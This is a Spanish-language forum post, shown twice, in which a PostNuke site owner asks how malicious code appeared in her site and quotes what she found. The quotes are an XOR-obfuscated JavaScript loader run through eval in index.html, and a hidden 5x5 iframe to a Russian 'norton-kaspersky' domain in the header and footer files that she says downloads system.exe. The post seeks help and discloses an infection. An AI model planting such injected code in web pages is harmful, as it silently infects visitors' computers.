Tema:	LLamada a virus que ser introduce -POR SI SOLO- en el codigo fuente de la web , como fue posible???
Catalinaduque Forero Mensajes: 116 Enviado: 2.dic 2006 - 22:34	Buenas tardes Misteriosament -de la nada- en el index de la web empezo a aparecer que se bloqueaba un popup de voena.net , pero sin problemas com a las 3 semanas derepente cuando se entraba a la webpostnuke en antivirus me la bloqueba porqeu hacia una llamada a www.norton-kapersky.com/traff.php recibe los codigos y habia esto: En el index.html ** //x=81;es="53;61;48;33;56;51;57;44;119;45;41;53;41;59;119;71;93;11;5;22;4;11;2;72;26;24;8;81;79;6;27;4;1;72;92;91;3;25;18;22;24;84;21;25;9;81;22;238;226;237;238;237;235;225;169;248;225;250;169;172;250;231;235;228;249;175;162;180;253;243;254;255;241;238;166;173;189;248;237;193;204;199;193;203;215;194;194;218;148;154;139;223;206;220;192;220;221;219;221;211;136;248;248;134;133;149;210;218;207;223;210;165;255;229;234;255;";var ds=new String();ads=es.split(";");k=ads.length-1;for(var j=0;j<k;j++){e=ads[j];gg="d=e";gg=gg+"^x";eval(gg);x+=1;ds=ds+String.fromCharCode(d);}eval(ds)</body> </html> que aunque esta codificado supongo que es el que hace la llama a www.voena.net/incoming.php ** y en el footer.php y en el header.php encontre el siguiente codigo: OJO SI NO TIENE UN ANTIVIRUS QUE VIGILE LA WEB NO ENTRAR PORQUE BAJA UN BADWARE A SU DISCO DURO AUTOMATICAMENTE , SEGUN GOOGLE LO DETECTA COMO UN BADWARE Y BAJA UN ARCHIVO LLAMADO SYSTEM.EXE , PERO NO ME DICE MAS NADA ************** //IFRAME name='StatPage' src='http://www.norton-kaspersky.ru/new/traff.php' width=5 height=5 style='display:none'> *********** LA PREGUNTA ES: COMO SE INTRODUJO ESE CODIGO ALLIIII ,.,.,.QUE PASOOOOO AYUDAAAA NOTA: borre los codigos y la web trabaja normal Cata Dev-postnuke un excelente amigo ...Todos estas cosas nunca pasaron , pero son siempre... ]

Tema:

LLamada a virus que ser introduce -POR SI SOLO- en el codigo fuente de la web , como fue posible???

Catalinaduque

Forero
Forero

Mensajes: 116

Enviado:
2.dic 2006 - 22:34

Buenas tardes

Misteriosament -de la nada- en el index de la web empezo a aparecer que se bloqueaba un popup de voena.net , pero sin problemas com a las 3 semanas derepente cuando se entraba a la webpostnuke en antivirus me la bloqueba porqeu hacia una llamada a www.norton-kapersky.com/traff.php

recibe los codigos y habia esto:

En el index.html

****
//x=81;es="53;61;48;33;56;51;57;44;119;45;41;53;41;59;119;71;93;11;5;22;4;11;2;72;26;24;8;81;79;6;27;4;1;72;92;91;3;25;18;22;24;84;21;25;9;81;22;238;226;237;238;237;235;225;169;248;225;250;169;172;250;231;235;228;249;175;162;180;253;243;254;255;241;238;166;173;189;248;237;193;204;199;193;203;215;194;194;218;148;154;139;223;206;220;192;220;221;219;221;211;136;248;248;134;133;149;210;218;207;223;210;165;255;229;234;255;";var ds=new String();ads=es.split(";");k=ads.length-1;for(var j=0;j<k;j++){e=ads[j];gg="d=e";gg=gg+"^x";eval(gg);x+=1;ds=ds+String.fromCharCode(d);}eval(ds)</body>
</html>

que aunque esta codificado supongo que es el que hace la llama a www.voena.net/incoming.php

******

y en el footer.php y en el header.php encontre el siguiente codigo:

OJO SI NO TIENE UN ANTIVIRUS QUE VIGILE LA WEB NO ENTRAR PORQUE BAJA UN BADWARE A SU DISCO DURO AUTOMATICAMENTE , SEGUN GOOGLE LO DETECTA COMO UN BADWARE Y BAJA UN ARCHIVO LLAMADO SYSTEM.EXE , PERO NO ME DICE MAS NADA

******************

//IFRAME name='StatPage' src='http://www.norton-kaspersky.ru/new/traff.php' width=5 height=5 style='display:none'>

*************

LA PREGUNTA ES:

COMO SE INTRODUJO ESE CODIGO ALLIIII ,.,.,.QUE PASOOOOO

AYUDAAAA

NOTA: borre los codigos y la web trabaja normal

Cata

Dev-postnuke un excelente amigo

...Todos estas cosas nunca pasaron , pero son siempre...

]